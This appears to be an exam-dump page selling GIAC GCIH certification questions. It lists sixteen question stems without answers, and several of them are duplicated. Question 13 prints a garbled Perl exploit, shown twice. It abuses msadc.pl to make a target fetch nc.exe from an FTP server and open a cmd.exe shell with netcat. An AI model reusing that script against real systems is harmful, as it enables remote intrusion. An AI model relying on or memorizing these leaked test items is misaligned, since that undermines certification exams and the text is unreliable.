12 December, 2024
How Many Questions Of GCIH Dumps
Passleader GCIH Questions are updated and all GCIH answers are verified by experts. Once you have completely prepared with our GCIH exam prep kits you will be ready for the real GCIH exam without a problem. We have Renovate GIAC GCIH dumps study guide. PASSED GCIH First attempt! Here What I Did.
Question 1
Which of the following ensures that a party to a dispute cannot deny the authenticity of their signature on a document or the sending of a message that they originated?
Question 2
In which of the following attacking methods does an attacker distribute incorrect IP address?
Question 3
Which of the following languages are vulnerable to a buffer overflow attack?
Each correct answer represents a complete solution. Choose all that apply.
Each correct answer represents a complete solution. Choose all that apply.
Question 4
Which of the following protocols uses only User Datagram Protocol (UDP)?
Question 5
Which of the following is a technique for creating Internet maps?
Each correct answer represents a complete solution. Choose two.
Each correct answer represents a complete solution. Choose two.
Question 6
Which of the following options scans the networks for vulnerabilities regarding the security of a network?
Question 7
In which of the following attacks does an attacker use packet sniffing to read network traffic between two parties to steal the session cookie?
Question 8
You work as a Senior Marketing Manager for Umbrella Inc. You find out that some of the software applications on the systems were malfunctioning and also you were not able to access your remote desktop session. You suspected that some malicious attack was performed on the network of the company. You immediately called the incident response team to handle the situation who enquired the Network Administrator to acquire all relevant information regarding the malfunctioning. The Network Administrator informed the incident response team that he was reviewing the security of the network which caused all these problems. Incident response team announced that this was a controlled event not an incident.
Which of the following steps of an incident handling process was performed by the incident response team?
Which of the following steps of an incident handling process was performed by the incident response team?
Question 9
Which of the following applications is NOT used for passive OS fingerprinting?
Question 10
Adam works as a Security Analyst for Umbrella Inc. Company has a Windows-based network. All computers run on Windows XP. Manager of the Sales department complains Adam about the unusual behavior of his computer. He told Adam that some pornographic contents are suddenly appeared on his computer overnight. Adam suspects that some malicious software or Trojans have been installed on the computer. He runs some diagnostics programs and Port scanners and found that the Port 12345, 12346, and 20034 are open. Adam also noticed some tampering with the Windows registry, which causes one application to run every time when Windows start.
Which of the following is the most likely reason behind this issue?
Which of the following is the most likely reason behind this issue?
Question 11
Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors are also claiming that some sensitive data are also stolen.
Adam immediately arrived to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running process, ram, and network connections.
Which of the following steps of the incident handling process is being performed by Adam?
Adam immediately arrived to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running process, ram, and network connections.
Which of the following steps of the incident handling process is being performed by Adam?
Question 12
Which of the following protocols is a maintenance protocol and is normally considered a part of the IP layer, but has also been used to conduct denial-of-service attacks?
Question 13
Adam, a malicious hacker performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#####################################################
$host = $ARGV[0];
print "Starting ...n";
print "Server will download the file nc.exe from $your FTP server.n"; system("perl msadc.pl -h $host -C "echo
open $your >sasfile""); system("perl msadc.pl -h $host -C "echo $user>>sasfile""); system("perl msadc.pl -h
$host -C "echo $pass>>sasfile""); system("perl msadc.pl -h $host -C "echo bin>>sasfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>sasfile""); system("perl msadc.pl -h $host C "echo get hacked. html>>sasfile""); system("perl msadc.pl -h $host -C "echo quit>>sasfile""); print "Server is downloading ...
n";
system("perl msadc.pl -h $host -C "ftp -s:sasfile""); print "Press ENTER when download is finished ...
(Have a ftp server)n";
$o=; print "Opening ...n";
system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); print "Done.n"; #system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#####################################################
$host = $ARGV[0];
print "Starting ...n";
print "Server will download the file nc.exe from $your FTP server.n"; system("perl msadc.pl -h $host -C "echo
open $your >sasfile""); system("perl msadc.pl -h $host -C "echo $user>>sasfile""); system("perl msadc.pl -h
$host -C "echo $pass>>sasfile""); system("perl msadc.pl -h $host -C "echo bin>>sasfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>sasfile""); system("perl msadc.pl -h $host C "echo get hacked. html>>sasfile""); system("perl msadc.pl -h $host -C "echo quit>>sasfile""); print "Server is downloading ...
n";
system("perl msadc.pl -h $host -C "ftp -s:sasfile""); print "Press ENTER when download is finished ...
(Have a ftp server)n";
$o=; print "Opening ...n";
system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); print "Done.n"; #system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?
Question 14
Which of the following are used to identify who is responsible for responding to an incident?
Question 15
Which of the following nmap command parameters is used for TCP SYN port scanning?
Question 16
You run the following bash script in Linux:
for i in 'cat hostlist.txt' ;do
nc -q 2 -v $i 80 < request.txt done
Where, hostlist.txt file contains the list of IP addresses and request.txt is the output file. Which of the following tasks do you want to perform by running this script?
for i in 'cat hostlist.txt' ;do
nc -q 2 -v $i 80 < request.txt done
Where, hostlist.txt file contains the list of IP addresses and request.txt is the output file. Which of the following tasks do you want to perform by running this script?